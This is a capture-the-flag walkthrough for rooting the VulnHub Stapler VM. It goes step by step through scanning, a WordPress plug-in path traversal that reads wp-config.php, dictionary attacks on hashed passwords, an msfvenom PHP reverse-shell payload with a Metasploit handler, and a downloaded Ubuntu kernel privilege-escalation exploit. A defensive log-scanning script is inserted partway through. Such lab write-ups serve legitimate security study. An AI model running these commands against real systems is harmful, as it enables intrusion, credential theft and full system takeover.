
Hack the Stapler VM (CTF Challenge)

In this article we will try to attack and gain root access to the Stapler: 1 challenge from VulnHub. The goal is to perform reconnaissance and enumeration, exploit this vulnerable machine to get root access, and read the contents of flag.txt. We have been told that there are various methods to do so, but we tried several and found the simplest way.
Download the Stapler VM from here
Walkthrough
Start off with scanning the network to find our target. The command for it is:
netdiscover
We found our target –> 192.168.1.105
To scan our target we will use Sparta. Sparta is a combination of nmap scanning and Nikto, which makes our work simpler. To open Sparta in Kali Linux, go to Applications > Information Gathering > Sparta. After opening Sparta, click where it says “click here to add host to scope”. A dialog box will open asking for the target’s IP. Enter your target’s IP there and click on add scope.
Once Sparta starts working, it will show you all the ports open on our target.

The result shows us that ports 21, 22, 53, 80, 137, 139, 666, 3306 and 12380 are open. The Nikto tab in Sparta for port 80 shows us that we can open our target IP in the browser; it also tells us that /.bashrc and /.profile are files which may contain useful information.
Firstly, we will open our target IP in the browser to see if we find anything.

As you can see, we do not find anything upon opening the target IP in the browser. So we then tried to open the two files which we found with the help of Nikto. When we open either file it asks us to download it. No harm in that, so we downloaded both files.
We regretted doing so, as there was nothing useful in either of these files. So we explored more of what Nikto has to provide and found out that we could exploit port 21, which runs an FTP service. Sparta also ran hydra for us and found the FTP username and password, which are ftp and ftp respectively.
Now that we had the username and password, we tried to exploit it from the Kali terminal by typing:
ftp 192.168.1.105
Name: ftp
Password: ftp

And again we found nothing there. Similarly, we tried to exploit ports 22, 139 and 666 respectively. Alas! We found nothing. Again!
So we decided to explore Nikto further and found that there was a robots.txt file on port 12380 with two entries. We also noticed that the site on this port uses SSL, which means it will only open with the prefix https://
So first we tried opening it in the browser on port 12380.

Finally, something happened! The site opened on port 12380. Then we opened robots.txt (https://192.168.1.105:12380/robots.txt) and found two entries, /admin112233/ and /blogblog/
We opened them one by one; only /blogblog/ proved to be useful, as a blog opened there.

Studying this blog we established that it is built on WordPress. Naturally, we use WPScan to learn all about the blog. To run wpscan we came up with a 3-in-1 command that tells us about the themes and plug-ins as well as the usernames:
wpscan --url https://192.168.1.105:12380/blogblog/ --enumerate ap,at,u
The wpscan output also informs us about the upload directory, as we have highlighted in the scan output above.


On completing the scan we found one plug-in, the advanced video plug-in, and we searched for its exploit on www.exploit-db.com and found one.
Reading through the exploit we found the correct URL to use to our advantage; the template is:
http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILE PATH]

We formatted the URL for our target:
https://192.168.1.105:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php

When our formatted URL is requested, it shows us an error. Also, if you pay attention, there will be some changes on the WordPress blog.

It gives us an image. We already know where the upload directory is (from WPScan), so we can go there directly to view or download the image. For this our URL will be:
https://192.168.1.105:12380/blogblog/wp-content/uploads/
Now if we try to open this image or download it, it shows us an error, as shown below:
The trick here is to download the image file without any extension. Run the following command to read the file:
cat 1439829871
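From the defender's side, the thing to watch in this step is the plug-in's thumb parameter, which is meant to hold a remote video thumbnail URL but is here fed a local path. As an added example (not code from the original walkthrough), the Python below scans web-server access logs for ave_publishPost calls whose thumb is a local or traversal path rather than a remote URL; the log lines and client IPs are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Apache access-log lines (not taken from the original page).
SAMPLE_LOG = """\
192.168.1.113 - - [10/Jun/2016:10:01:02 +0000] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php HTTP/1.1" 500 512
192.168.1.113 - - [10/Jun/2016:10:01:09 +0000] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=x&short=1&term=1&thumb=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 500 512
192.168.1.50 - - [10/Jun/2016:10:02:00 +0000] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=clip&short=1&term=1&thumb=http://example.org/clip.jpg HTTP/1.1" 200 88
192.168.1.50 - - [10/Jun/2016:10:02:30 +0000] "GET /blogblog/index.php HTTP/1.1" 200 4120
"""

# Common log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

def thumb_reason(thumb: str) -> str:
    """Return why a thumb value looks like a local file read, or "" if benign."""
    # Decode twice so double-encoded traversal sequences are also normalised.
    lower = unquote(unquote(thumb)).replace("\\", "/").lower()
    if lower.startswith(("http://", "https://")):
        return ""                      # remote thumbnail: the plug-in's intended use
    if "../" in lower:
        return "directory traversal"
    if lower.startswith(("/", "file:")):
        return "absolute local path"
    return ""

def find_ave_lfi(log_text: str) -> list:
    """Return (client_ip, thumb, reason) for every suspicious ave_publishPost call."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["uri"])
        if not parts.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        qs = parse_qs(parts.query)           # percent-decodes each parameter once
        if qs.get("action", [""])[0] != "ave_publishPost":
            continue
        for thumb in qs.get("thumb", []):
            reason = thumb_reason(thumb)
            if reason:
                hits.append((m["ip"], thumb, reason))
    return hits

if __name__ == "__main__":
    for ip, thumb, reason in find_ave_lfi(SAMPLE_LOG):
        print(f"{ip}: thumb={thumb!r} ({reason})")
```

On a real server the same logic applies to the access log of whichever host serves the blog, and a 500 response to such a request is itself a useful secondary signal.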

This provides us with the username and password for MySQL. To connect to the MySQL database we will use a third-party tool called HeidiSQL_9.3_Portable.
Open the tool; enter the target IP as the hostname, the username in the user field and the password in the password field. Then click on OK.
On clicking OK we enter the database.

Click on wp_users to see the usernames and passwords of all the users.

As you can see, all the passwords are stored as hashes. So now we will run a dictionary attack with WPScan against the first username we found, john, using rockyou.txt. The command to do so is:
wpscan --url https://192.168.1.105:12380/blogblog --wordlist /usr/share/wordlists/rockyou.txt --username john
Once the attack is complete we have the password for the user john, which is “incorrect”.

Now we will log on using the said username and password.

Now that we are logged in, all we have to do is create our PHP code to upload, so that once it executes we get a session. To generate the code type:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.113 LPORT=4444 -f raw
Copy the code from <?php to die() and save it in a file with a .php extension.
Now, as we are already logged on, go to the Plugins option and select Add New. Click on the browse option, select the PHP file in which you have just saved the code and click on OK.
Now go to the upload directory and double click on the file you just uploaded.

Simultaneously, open metasploit and type:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.113
set lport 4444
exploit
Executing the above we get a meterpreter session. Next type:
shell
Then type the following two commands, which write and run a small Python file to get a proper terminal:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
Now we check the Ubuntu version so that we can find an exploit for it:
lsb_release -a
Next, with the following command we find a writable directory:
find / -writable -type d 2>/dev/null

We now know that our target is running Ubuntu 16.04, so we search for an exploit for it on exploit-db.com. Our search is successful and we have found an appropriate exploit, as shown below:
We already know that this exploit is not available in Metasploit, so we copy its download link as shown:

Now we need to change into the writable directory we chose; for that type:
cd /tmp
And then, to download the exploit, type:
wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

The exploit is downloaded as a zip file, so now unzip it by typing:
unzip 39772.zip

Enter the unzipped directory by typing:
ls
cd 39772
Now we have a tar file named exploit.tar. Extract it with the following command:
tar -xvf exploit.tar

Now use the ls command to view the directories. Next we go into the doubleput exploit folder; for that type:
cd ebpf_mapfd_doubleput_exploit
ls (lists the directory contents)
./compile.sh (builds the exploit)
./doubleput (runs the compiled exploit)
whoami (tells you which user you have become)
cd /root (takes you into /root)
ls (shows you the contents of /root)
cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast
